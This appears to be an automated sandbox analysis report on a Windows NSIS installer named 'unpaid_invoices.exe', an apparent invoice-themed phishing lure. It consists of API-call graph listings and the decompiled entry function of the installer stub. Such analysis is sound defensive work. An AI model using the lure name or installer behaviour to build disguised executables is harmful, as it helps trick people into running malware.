3751 4066ab 17 API calls 3748->3751 3750 4066ab 17 API calls 3749->3750 3752 401901 3750->3752 3754 4018ee lstrcatW 3751->3754 3755 405cce MessageBoxIndirectW 3752->3755 3753->3745 3754->3752 3755->3746 3756->3745 3757->3725 3758->3726 4006 401a72 4007 402d84 17 API calls 4006->4007 4008 401a7b 4007->4008 4009 402d84 17 API calls 4008->4009 4010 401a20 4009->4010 4011 401573 4012 401583 ShowWindow 4011->4012 4013 40158c 4011->4013 4012->4013 4014 402c2a 4013->4014 4015 40159a ShowWindow 4013->4015 4015->4014 4016 404a74 4017 404a84 4016->4017 4018 404aaa 4016->4018 4019 4045ca 18 API calls 4017->4019 4020 404631 8 API calls 4018->4020 4021 404a91 SetDlgItemTextW 4019->4021 4022 404ab6 4020->4022 4021->4018 4023 4023f4 4024 402da6 17 API calls 4023->4024 4025 402403 4024->4025 4026 402da6 17 API calls 4025->4026 4027 40240c 4026->4027 4028 402da6 17 API calls 4027->4028 4029 402416 GetPrivateProfileStringW 4028->4029 4030 4014f5 SetForegroundWindow 4031 402c2a 4030->4031 4032 401ff6 4033 402da6 17 API calls 4032->4033 4034 401ffd 4033->4034 4035 4069a4 2 API calls 4034->4035 4036 402003 4035->4036 4038 402014 4036->4038 4039 4065b5 wsprintfW 4036->4039 4039->4038 4040 401b77 4041 402da6 17 API calls 4040->4041 4042 401b7e 4041->4042 4043 402d84 17 API calls 4042->4043 4044 401b87 wsprintfW 4043->4044 4045 402c2a 4044->4045 4046 40167b 4047 402da6 17 API calls 4046->4047 4048 401682 4047->4048 4049 402da6 17 API calls 4048->4049 4050 40168b 4049->4050 4051 402da6 17 API calls 4050->4051 4052 401694 MoveFileW 4051->4052 4053 4016a7 4052->4053 4059 4016a0 4052->4059 4054 4069a4 2 API calls 4053->4054 4055 4022f6 4053->4055 4057 4016b6 4054->4057 4056 401423 24 API calls 4056->4055 4057->4055 4058 40642e 36 API calls 4057->4058 4058->4059 4059->4056 4060 4019ff 4061 402da6 17 API calls 4060->4061 4062 401a06 4061->4062 4063 402da6 17 API calls 4062->4063 4064 401a0f 4063->4064 4065 401a16 lstrcmpiW 4064->4065 4066 401a28 lstrcmpW 4064->4066 4067 401a1c 4065->4067 4066->4067 4068 4022ff 4069 402da6 17 API calls 4068->4069 4070 402305 4069->4070 4071 402da6 17 API calls 4070->4071 4072 40230e 4071->4072 4073 402da6 17 API calls 4072->4073 4074 402317 4073->4074 4075 4069a4 2 API calls 4074->4075 4076 402320 4075->4076 4077 402331 lstrlenW lstrlenW 4076->4077 4078 402324 4076->4078 4080 4056d0 24 API calls 4077->4080 4079 4056d0 24 API calls 4078->4079 4082 40232c 4078->4082 4079->4082 4081 40236f SHFileOperationW 4080->4081 4081->4078 4081->4082 4083 401000 4084 401037 BeginPaint GetClientRect 4083->4084 4085 40100c DefWindowProcW 4083->4085 4086 4010f3 4084->4086 4090 401179 4085->4090 4088 401073 CreateBrushIndirect FillRect DeleteObject 4086->4088 4089 4010fc 4086->4089 4088->4086 4091 401102 CreateFontIndirectW 4089->4091 4092 401167 EndPaint 4089->4092 4091->4092 4093 401112 6 API calls 4091->4093 4092->4090 4093->4092 4094 404700 lstrcpynW lstrlenW 4095 401d81 4096 401d94 GetDlgItem 4095->4096 4097 401d87 4095->4097 4100 401d8e 4096->4100 4098 402d84 17 API calls 4097->4098 4098->4100 4099 401dd5 GetClientRect LoadImageW SendMessageW 4103 401e33 4099->4103 4105 401e3f 4099->4105 4100->4099 4101 402da6 17 API calls 4100->4101 4101->4099 4104 401e38 DeleteObject 4103->4104 4103->4105 4104->4105 4106 401503 4107 40150b 4106->4107 4109 40151e 4106->4109 4108 402d84 17 API calls 4107->4108 4108->4109 4110 402383 4111 40238a 4110->4111 4113 40239d 4110->4113 4112 4066ab 17 API calls 4111->4112 4114 402397 4112->4114 4115 405cce MessageBoxIndirectW 4114->4115 4115->4113 4116 402c05 SendMessageW 4117 402c1f InvalidateRect 4116->4117 4118 402c2a 4116->4118 4117->4118 4119 404789 4121 4048bb 4119->4121 4122 4047a1 4119->4122 4120 404925 4123 4049ef 4120->4123 4124 40492f GetDlgItem 4120->4124 4121->4120 4121->4123 4130 4048f6 GetDlgItem SendMessageW 4121->4130 4125 4045ca 18 API calls 4122->4125 4129 404631 8 API calls 4123->4129 4126 4049b0 4124->4126 4127 404949 4124->4127 4128 404808 4125->4128 4126->4123 4133 4049c2 4126->4133 4127->4126 4132 40496f SendMessageW LoadCursorW SetCursor 4127->4132 4131 4045ca 18 API calls 4128->4131 4143 4049ea 4129->4143 4152 4045ec EnableWindow 4130->4152 4136 404815 CheckDlgButton 4131->4136 4156 404a38 4132->4156 4138 4049d8 4133->4138 4139 4049c8 SendMessageW 4133->4139 4135 404920 4153 404a14 4135->4153 4150 4045ec EnableWindow 4136->4150 4138->4143 4144 4049de SendMessageW 4138->4144 4139->4138 4144->4143 4145 404833 GetDlgItem 4151 4045ff SendMessageW 4145->4151 4147 404849 SendMessageW 4148 404866 GetSysColor 4147->4148 4149 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4147->4149 4148->4149 4149->4143 4150->4145 4151->4147 4152->4135 4154 404a22 4153->4154 4155 404a27 SendMessageW 4153->4155 4154->4155 4155->4120 4159 405c94 ShellExecuteExW 4156->4159 4158 40499e LoadCursorW SetCursor 4158->4126 4159->4158 4160 40248a 4161 402da6 17 API calls 4160->4161 4162 40249c 4161->4162 4163 402da6 17 API calls 4162->4163 4164 4024a6 4163->4164 4177 402e36 4164->4177 4167 4024de 4168 4024ea 4167->4168 4172 402d84 17 API calls 4167->4172 4173 402509 RegSetValueExW 4168->4173 4174 403377 40 API calls 4168->4174 4169 40292e 4170 402da6 17 API calls 4171 4024d4 lstrlenW 4170->4171 4171->4167 4172->4168 4175 40251f RegCloseKey 4173->4175 4174->4173 4175->4169 4178 402e51 4177->4178 4181 406509 4178->4181 4182 406518 4181->4182 4183 406523 RegCreateKeyExW 4182->4183 4184 4024b6 4182->4184 4183->4184 4184->4167 4184->4169 4184->4170 4185 40290b 4186 402da6 17 API calls 4185->4186 4187 402912 FindFirstFileW 4186->4187 4188 40293a 4187->4188 4192 402925 4187->4192 4193 4065b5 wsprintfW 4188->4193 4190 402943 4194 40666e lstrcpynW 4190->4194 4193->4190 4194->4192 4195 40190c 4196 401943 4195->4196 4197 402da6 17 API calls 4196->4197 4198 401948 4197->4198 4199 405d7a 67 API calls 4198->4199 4200 401951 4199->4200 4201 40190f 4202 402da6 17 API calls 4201->4202 4203 401916 4202->4203 4204 405cce MessageBoxIndirectW 4203->4204 4205 40191f 4204->4205 4206 40580f 4207 405830 GetDlgItem GetDlgItem GetDlgItem 4206->4207 4208 4059b9 4206->4208 4251 4045ff SendMessageW 4207->4251 4210 4059c2 GetDlgItem CreateThread CloseHandle 4208->4210 4211 4059ea 4208->4211 4210->4211 4213 405a01 ShowWindow ShowWindow 4211->4213 4214 405a3a 4211->4214 4215 405a15 4211->4215 4212 4058a0 4217 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4212->4217 4253 4045ff SendMessageW 4213->4253 4221 404631 8 API calls 4214->4221 4216 405a75 4215->4216 4219 405a29 4215->4219 4220 405a4f ShowWindow 4215->4220 4216->4214 4226 405a83 SendMessageW 4216->4226 4224 405915 4217->4224 4225 4058f9 SendMessageW SendMessageW 4217->4225 4227 4045a3 SendMessageW 4219->4227 4222 405a61 4220->4222 4223 405a6f 4220->4223 4228 405a48 4221->4228 4229 4056d0 24 API calls 4222->4229 4230 4045a3 SendMessageW 4223->4230 4231 405928 4224->4231 4232 40591a SendMessageW 4224->4232 4225->4224 4226->4228 4233 405a9c CreatePopupMenu 4226->4233 4227->4214 4229->4223 4230->4216 4235 4045ca 18 API calls 4231->4235 4232->4231 4234 4066ab 17 API calls 4233->4234 4236 405aac AppendMenuW 4234->4236 4237 405938 4235->4237 4238 405ac9 GetWindowRect 4236->4238 4239 405adc TrackPopupMenu 4236->4239 4240 405941 ShowWindow 4237->4240 4241 405975 GetDlgItem SendMessageW 4237->4241 4238->4239 4239->4228 4243 405af7 4239->4243 4244 405964 4240->4244 4245 405957 ShowWindow 4240->4245 4241->4228 4242 40599c SendMessageW SendMessageW 4241->4242 4242->4228 4246 405b13 SendMessageW 4243->4246 4252 4045ff SendMessageW 4244->4252 4245->4244 4246->4246 4248 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4246->4248 4249 405b55 SendMessageW 4248->4249 4249->4249 4250 405b7e GlobalUnlock SetClipboardData CloseClipboard 4249->4250 4250->4228 4251->4212 4252->4241 4253->4215 4254 404e11 4255 404e21 4254->4255 4256 404e3d 4254->4256 4265 405cb2 GetDlgItemTextW 4255->4265 4258 404e70 4256->4258 4259 404e43 SHGetPathFromIDListW 4256->4259 4261 404e5a SendMessageW 4259->4261 4262 404e53 4259->4262 4260 404e2e SendMessageW 4260->4256 4261->4258 4264 40140b 2 API calls 4262->4264 4264->4261 4265->4260 4266 401491 4267 4056d0 24 API calls 4266->4267 4268 401498 4267->4268 4269 402891 4270 402898 4269->4270 4271 402ba9 4269->4271 4272 402d84 17 API calls 4270->4272 4273 40289f 4272->4273 4274 4028ae SetFilePointer 4273->4274 4274->4271 4275 4028be 4274->4275 4277 4065b5 wsprintfW 4275->4277 4277->4271 4278 401f12 4279 402da6 17 API calls 4278->4279 4280 401f18 4279->4280 4281 402da6 17 API calls 4280->4281 4282 401f21 4281->4282 4283 402da6 17 API calls 4282->4283 4284 401f2a 4283->4284 4285 402da6 17 API calls 4284->4285 4286 401f33 4285->4286 4287 401423 24 API calls 4286->4287 4288 401f3a 4287->4288 4295 405c94 ShellExecuteExW 4288->4295 4290 401f82 4291 406ae6 5 API calls 4290->4291 4293 40292e 4290->4293 4292 401f9f CloseHandle 4291->4292 4292->4293 4295->4290 4296 402f93 4297 402fa5 SetTimer 4296->4297 4298 402fbe 4296->4298 4297->4298 4299 40300c 4298->4299 4300 403012 MulDiv 4298->4300 4301 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4300->4301 4301->4299 4303 401d17 4304 402d84 17 API calls 4303->4304 4305 401d1d IsWindow 4304->4305 4306 401a20 4305->4306 4307 401b9b 4308 401ba8 4307->4308 4309 401bec 4307->4309 4310 401c31 4308->4310 4317 401bbf 4308->4317 4311 401bf1 4309->4311 4312 401c16 GlobalAlloc 4309->4312 4313 4066ab 17 API calls 4310->4313 4321 40239d 4310->4321 4311->4321 4328 40666e lstrcpynW 4311->4328 4314 4066ab 17 API calls 4312->4314 4315 402397 4313->4315 4314->4310 4320 405cce MessageBoxIndirectW 4315->4320 4326 40666e lstrcpynW 4317->4326 4318 401c03 GlobalFree 4318->4321 4320->4321 4322 401bce 4327 40666e lstrcpynW 4322->4327 4324 401bdd 4329 40666e lstrcpynW 4324->4329 4326->4322 4327->4324 4328->4318 4329->4321 4330 40261c 4331 402da6 17 API calls 4330->4331 4332 402623 4331->4332 4335 40615e GetFileAttributesW CreateFileW 4332->4335 4334 40262f 4335->4334 4336 40149e 4337 4014ac PostQuitMessage 4336->4337 4338 40239d 4336->4338 4337->4338 4339 40259e 4349 402de6 4339->4349 4342 402d84 17 API calls 4343 4025b1 4342->4343 4344 4025d9 RegEnumValueW 4343->4344 4345 4025cd RegEnumKeyW 4343->4345 4347 40292e 4343->4347 4346 4025ee RegCloseKey 4344->4346 4345->4346 4346->4347 4350 402da6 17 API calls 4349->4350 4351 402dfd 4350->4351 4352 4064db RegOpenKeyExW 4351->4352 4353 4025a8 4352->4353 4353->4342 4354 4015a3 4355 402da6 17 API calls 4354->4355 4356 4015aa SetFileAttributesW 4355->4356 4357 4015bc 4356->4357 3287 401fa4 3288 402da6 17 API calls 3287->3288 3289 401faa 3288->3289 3290 4056d0 24 API calls 3289->3290 3291 401fb4 3290->3291 3302 405c51 CreateProcessW 3291->3302 3294 401fdd CloseHandle 3298 40292e 3294->3298 3297 401fcf 3299 401fd4 3297->3299 3300 401fdf 3297->3300 3310 4065b5 wsprintfW 3299->3310 3300->3294 3303 401fba 3302->3303 3304 405c84 CloseHandle 3302->3304 3303->3294 3303->3298 3305 406ae6 WaitForSingleObject 3303->3305 3304->3303 3306 406b00 3305->3306 3307 406b12 GetExitCodeProcess 3306->3307 3311 406a77 3306->3311 3307->3297 3310->3294 3312 406a94 PeekMessageW 3311->3312 3313 406aa4 WaitForSingleObject 3312->3313 3314 406a8a DispatchMessageW 3312->3314 3313->3306 3314->3312 4358 40202a 4359 402da6 17 API calls 4358->4359 4360 402031 4359->4360 4361 406a3b 5 API calls 4360->4361 4362 402040 4361->4362 4363 4020cc 4362->4363 4364 40205c GlobalAlloc 4362->4364 4364->4363 4365 402070 4364->4365 4366 406a3b 5 API calls 4365->4366 4367 402077 4366->4367 4368 406a3b 5 API calls 4367->4368 4369 402081 4368->4369 4369->4363 4373 4065b5 wsprintfW 4369->4373 4371 4020ba 4374 4065b5 wsprintfW 4371->4374 4373->4371 4374->4363 4375 40252a 4376 402de6 17 API calls 4375->4376 4377 402534 4376->4377 4378 402da6 17 API calls 4377->4378 4379 40253d 4378->4379 4380 402548 RegQueryValueExW 4379->4380 4383 40292e 4379->4383 4381 402568 4380->4381 4382 40256e RegCloseKey 4380->4382 4381->4382 4386 4065b5 wsprintfW 4381->4386 4382->4383 4386->4382 4387 4021aa 4388 402da6 17 API calls 4387->4388 4389 4021b1 4388->4389 4390 402da6 17 API calls 4389->4390 4391 4021bb 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4021c5 4392->4393 4394 402da6 17 API calls 4393->4394 4395 4021cf 4394->4395 4396 402da6 17 API calls 4395->4396 4397 4021d9 4396->4397 4398 402218 CoCreateInstance 4397->4398 4399 402da6 17 API calls 4397->4399 4402 402237 4398->4402 4399->4398 4400 401423 24 API calls 4401 4022f6 4400->4401 4402->4400 4402->4401 3699 403c2b 3700 403c46 3699->3700 3701 403c3c CloseHandle 3699->3701 3702 403c50 CloseHandle 3700->3702 3703 403c5a 3700->3703 3701->3700 3702->3703 3708 403c88 3703->3708 3706 405d7a 67 API calls 3707 403c6b 3706->3707 3709 403c96 3708->3709 3710 403c5f 3709->3710 3711 403c9b FreeLibrary GlobalFree 3709->3711 3710->3706 3711->3710 3711->3711 4403 401a30 4404 402da6 17 API calls 4403->4404 4405 401a39 ExpandEnvironmentStringsW 4404->4405 4406 401a4d 4405->4406 4408 401a60 4405->4408 4407 401a52 lstrcmpW 4406->4407 4406->4408 4407->4408 4414 4023b2 4415 4023c0 4414->4415 4416 4023ba 4414->4416 4418 4023ce 4415->4418 4419 402da6 17 API calls 4415->4419 4417 402da6 17 API calls 4416->4417 4417->4415 4420 4023dc 4418->4420 4422 402da6 17 API calls 4418->4422 4419->4418 4421 402da6 17 API calls 4420->4421 4423 4023e5 WritePrivateProfileStringW 4421->4423 4422->4420 4424 402434 4425 402467 4424->4425 4426 40243c 4424->4426 4428 402da6 17 API calls 4425->4428 4427 402de6 17 API calls 4426->4427 4429 402443 4427->4429 4430 40246e 4428->4430 4432 40247b 4429->4432 4433 402da6 17 API calls 4429->4433 4435 402e64 4430->4435 4434 402454 RegDeleteValueW RegCloseKey 4433->4434 4434->4432 4436 402e78 4435->4436 4438 402e71 4435->4438 4436->4438 4439 402ea9 4436->4439 4438->4432 4440 4064db RegOpenKeyExW 4439->4440 4441 402ed7 4440->4441 4442 402f81 4441->4442 4443 402ee7 RegEnumValueW 4441->4443 4447 402f0a 4441->4447 4442->4438 4444 402f71 RegCloseKey 4443->4444 4443->4447 4444->4442 4445 402f46 RegEnumKeyW 4446 402f4f RegCloseKey 4445->4446 4445->4447 4448 406a3b 5 API calls 4446->4448 4447->4444 4447->4445 4447->4446 4449 402ea9 6 API calls 4447->4449 4450 402f5f 4448->4450 4449->4447 4450->4442 4451 402f63 RegDeleteKeyW 4450->4451 4451->4442 4452 401735 4453 402da6 17 API calls 4452->4453 4454 40173c SearchPathW 4453->4454 4455 401757 4454->4455 4456 405037 GetDlgItem GetDlgItem 4457 405089 7 API calls 4456->4457 4468 4052ae 4456->4468 4458 405130 DeleteObject 4457->4458 4459 405123 SendMessageW 4457->4459 4460 405139 4458->4460 4459->4458 4462 405170 4460->4462 4463 4066ab 17 API calls 4460->4463 4461 405390 4465 40543c 4461->4465 4475 4053e9 SendMessageW 4461->4475 4499 4052a1 4461->4499 4464 4045ca 18 API calls 4462->4464 4469 405152 SendMessageW SendMessageW 4463->4469 4470 405184 4464->4470 4466 405446 SendMessageW 4465->4466 4467 40544e 4465->4467 4466->4467 4477 405460 ImageList_Destroy 4467->4477 4478 405467 4467->4478 4489 405477 4467->4489 4468->4461 4473 404f85 5 API calls 4468->4473 4495 40531d 4468->4495 4469->4460 4474 4045ca 18 API calls 4470->4474 4471 405382 SendMessageW 4471->4461 4472 404631 8 API calls 4476 40563d 4472->4476 4473->4495 4486 405195 4474->4486 4480 4053fe SendMessageW 4475->4480 4475->4499 4477->4478 4481 405470 GlobalFree 4478->4481 4478->4489 4479 4055f1 4484 405603 ShowWindow GetDlgItem ShowWindow 4479->4484 4479->4499 4483 405411 4480->4483 4481->4489 4482 405270 GetWindowLongW SetWindowLongW 4485 405289 4482->4485 4490 405422 SendMessageW 4483->4490 4484->4499 4487 4052a6 4485->4487 4488 40528e ShowWindow 4485->4488 4486->4482 4491 40526b 4486->4491 4494 4051e8 SendMessageW 4486->4494 4496 405226 SendMessageW 4486->4496 4497 40523a SendMessageW 4486->4497 4509 4045ff SendMessageW 4487->4509 4508 4045ff SendMessageW 4488->4508 4489->4479 4498 405005 4 API calls 4489->4498 4503 4054b2 4489->4503 4490->4465 4491->4482 4491->4485 4494->4486 4495->4461 4495->4471 4496->4486 4497->4486 4498->4503 4499->4472 4500 4055bc 4501 4055c7 InvalidateRect 4500->4501 4504 4055d3 4500->4504 4501->4504 4502 4054e0 SendMessageW 4507 4054f6 4502->4507 4503->4502 4503->4507 4504->4479 4510 404f40 4504->4510 4506 40556a SendMessageW SendMessageW 4506->4507 4507->4500 4507->4506 4508->4499 4509->4468 4513 404e77 4510->4513 4512 404f55 4512->4479 4514 404e90 4513->4514 4515 4066ab 17 API calls 4514->4515 4516 404ef4 4515->4516 4517 4066ab 17 API calls 4516->4517 4518 404eff 4517->4518 4519 4066ab 17 API calls 4518->4519 4520 404f15 lstrlenW wsprintfW SetDlgItemTextW 4519->4520 4520->4512 4521 401d38 4522 402d84 17 API calls 4521->4522 4523 401d3f 4522->4523 4524 402d84 17 API calls 4523->4524 4525 401d4b GetDlgItem 4524->4525 4526 402638 4525->4526 4527 4014b8 4528 4014be 4527->4528 4529 401389 2 API calls 4528->4529 4530 4014c6 4529->4530 4531 40473a lstrlenW 4532 404759 4531->4532 4533 40475b WideCharToMultiByte 4531->4533 4532->4533 4534 404abb 4535 404ae7 4534->4535 4536 404af8 4534->4536 4595 405cb2 GetDlgItemTextW 4535->4595 4538 404b04 GetDlgItem 4536->4538 4543 404b63 4536->4543 4541 404b18 4538->4541 4539 404c47 4544 404df6 4539->4544 4597 405cb2 GetDlgItemTextW 4539->4597 4540 404af2 4542 4068f5 5 API calls 4540->4542 4546 404b2c SetWindowTextW 4541->4546 4547 405fe8 4 API calls 4541->4547 4542->4536 4543->4539 4543->4544 4548 4066ab 17 API calls 4543->4548 4551 404631 8 API calls 4544->4551 4550 4045ca 18 API calls 4546->4550 4552 404b22 4547->4552 4553 404bd7 SHBrowseForFolderW 4548->4553 4549 404c77 4554 406045 18 API calls 4549->4554 4555 404b48 4550->4555 4556 404e0a 4551->4556 4552->4546 4560 405f3d 3 API calls 4552->4560 4553->4539 4557 404bef CoTaskMemFree 4553->4557 4558 404c7d 4554->4558 4559 4045ca 18 API calls 4555->4559 4561 405f3d 3 API calls 4557->4561 4598 40666e lstrcpynW 4558->4598 4562 404b56 4559->4562 4560->4546 4563 404bfc 4561->4563 4596 4045ff SendMessageW 4562->4596 4566 404c33 SetDlgItemTextW 4563->4566 4571 4066ab 17 API calls 4563->4571 4566->4539 4567 404b5c 4569 406a3b 5 API calls 4567->4569 4568 404c94 4570 406a3b 5 API calls 4568->4570 4569->4543 4577 404c9b 4570->4577 4572 404c1b lstrcmpiW 4571->4572 4572->4566 4575 404c2c lstrcatW 4572->4575 4573 404cdc 4599 40666e lstrcpynW 4573->4599 4575->4566 4576 404ce3 4578 405fe8 4 API calls 4576->4578 4577->4573 4581 405f89 2 API calls 4577->4581 4583 404d34 4577->4583 4579 404ce9 GetDiskFreeSpaceW 4578->4579 4582 404d0d MulDiv 4579->4582 4579->4583 4581->4577 4582->4583 4584 404da5 4583->4584 4586 404f40 20 API calls 4583->4586 4585 404dc8 4584->4585 4587 40140b 2 API calls 4584->4587 4600 4045ec EnableWindow 4585->4600 4588 404d92 4586->4588 4587->4585 4590 404da7 SetDlgItemTextW 4588->4590 4591 404d97 4588->4591 4590->4584 4593 404e77 20 API calls 4591->4593 4592 404de4 4592->4544 4594 404a14 SendMessageW 4592->4594 4593->4584 4594->4544 4595->4540 4596->4567 4597->4549 4598->4568 4599->4576 4600->4592 4601 40263e 4602 402652 4601->4602 4603 40266d 4601->4603 4604 402d84 17 API calls 4602->4604 4605 402672 4603->4605 4606 40269d 4603->4606 4613 402659 4604->4613 4607 402da6 17 API calls 4605->4607 4608 402da6 17 API calls 4606->4608 4609 402679 4607->4609 4610 4026a4 lstrlenW 4608->4610 4618 406690 WideCharToMultiByte 4609->4618 4610->4613 4612 40268d lstrlenA 4612->4613 4614 4026e7 4613->4614 4616 40623f 5 API calls 4613->4616 4617 4026d1 4613->4617 4615 406210 WriteFile 4615->4614 4616->4617 4617->4614 4617->4615 4618->4612

              Executed Functions

              Function 00403646 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 403646-403696 SetErrorMode GetVersionExW 1 4036d0-4036d7 0->1 2 403698-4036cc GetVersionExW 0->2 3 4036e1-403721 1->3 4 4036d9 1->4 2->1 5 403723-40372b call 406a3b 3->5 6 403734 3->6 4->3 5->6 12 40372d 5->12 7 403739-40374d call 4069cb lstrlenA 6->7 13 40374f-40376b call 406a3b * 3 7->13 12->6 20 40377c-4037de #17 OleInitialize SHGetFileInfoW call 40666e GetCommandLineW call 40666e 13->20 21 40376d-403773 13->21 28 4037e0-4037e2 20->28 29 4037e7-4037fa call 405f6a CharNextW 20->29 21->20 26 403775 21->26 26->20 28->29 32 4038f1-4038f7 29->32 33 4038fd 32->33 34 4037ff-403805 32->34 37 403911-40392b GetTempPathW call 403615 33->37 35 403807-40380c 34->35 36 40380e-403814 34->36 35->35 35->36 39 403816-40381a 36->39 40 40381b-40381f 36->40 44 403983-40399b DeleteFileW call 4030d0 37->44 45 40392d-40394b GetWindowsDirectoryW lstrcatW call 403615 37->45 39->40 42 403825-40382b 40->42 43 4038df-4038ed call 405f6a 40->43 47 403845-40387e 42->47 48 40382d-403834 42->48 43->32 61 4038ef-4038f0 43->61 66 4039a1-4039a7 44->66 67 403b72-403b80 ExitProcess OleUninitialize 44->67 45->44 64 40394d-40397d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403615 45->64 49 403880-403885 47->49 50 40389a-4038d4 47->50 54 403836-403839 48->54 55 40383b 48->55 49->50 56 403887-40388f 49->56 58 4038d6-4038da 50->58 59 4038dc-4038de 50->59 54->47 54->55 55->47 62 403891-403894 56->62 63 403896 56->63 58->59 65 4038ff-40390c call 40666e 58->65 59->43 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 4039ad-4039c0 call 405f6a 66->71 72 403a4e-403a55 call 403d1d 66->72 68 403b82-403b91 call 405cce ExitProcess 67->68 69 403b97-403b9d 67->69 75 403c15-403c1d 69->75 76 403b9f-403bb4 GetCurrentProcess OpenProcessToken 69->76 87 403a12-403a1f 71->87 88 4039c2-4039f7 71->88 80 403a5a-403a5d 72->80 81 403c22-403c25 ExitProcess 75->81 82 403c1f 75->82 84 403be5-403bf3 call 406a3b 76->84 85 403bb6-403bdf LookupPrivilegeValueW AdjustTokenPrivileges 76->85 80->67 82->81 98 403c01-403c0c ExitWindowsEx 84->98 99 403bf5-403bff 84->99 85->84 91 403a21-403a2f call 406045 87->91 92 403a62-403a76 call 405c39 lstrcatW 87->92 90 4039f9-4039fd 88->90 94 403a06-403a0e 90->94 95 4039ff-403a04 90->95 91->67 107 403a35-403a4b call 40666e * 2 91->107 105 403a83-403a9d lstrcatW lstrcmpiW 92->105 106 403a78-403a7e lstrcatW 92->106 94->90 101 403a10 94->101 95->94 95->101 98->75 100 403c0e-403c10 call 40140b 98->100 99->98 99->100 100->75 101->87 109 403b70 105->109 110 403aa3-403aa6 105->110 106->105 107->72 109->67 112 403aa8-403aad call 405b9f 110->112 113 403aaf call 405c1c 110->113 119 403ab4-403ac4 SetCurrentDirectoryW 112->119 113->119 121 403ad1-403afd call 40666e 119->121 122 403ac6-403acc call 40666e 119->122 126 403b02-403b1d call 4066ab DeleteFileW 121->126 122->121 129 403b5d-403b67 126->129 130 403b1f-403b2f CopyFileW 126->130 129->126 132 403b69-403b6b call 40642e 129->132 130->129 131 403b31-403b51 call 40642e call 4066ab call 405c51 130->131 131->129 140 403b53-403b5a CloseHandle 131->140 132->109 140->129
              C-Code - Quality: 78%
              			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b58 = _v324.dwBuildNumber;
				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b5e != 0x600) {
					_t179 = E00406A3B(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069CB(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A3B(0xb);
				 *0x7a8aa4 = E00406A3B(9);
				_t88 = E00406A3B(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x7a8b60 = _t88;
				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040666E(0x7a7aa0, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ";
				E0040666E(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x7a8aa0 = 0x400000;
				_t250 = L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M007B3002;
				}
				_t198 = CharNextW(E00405F6A(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F6A(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
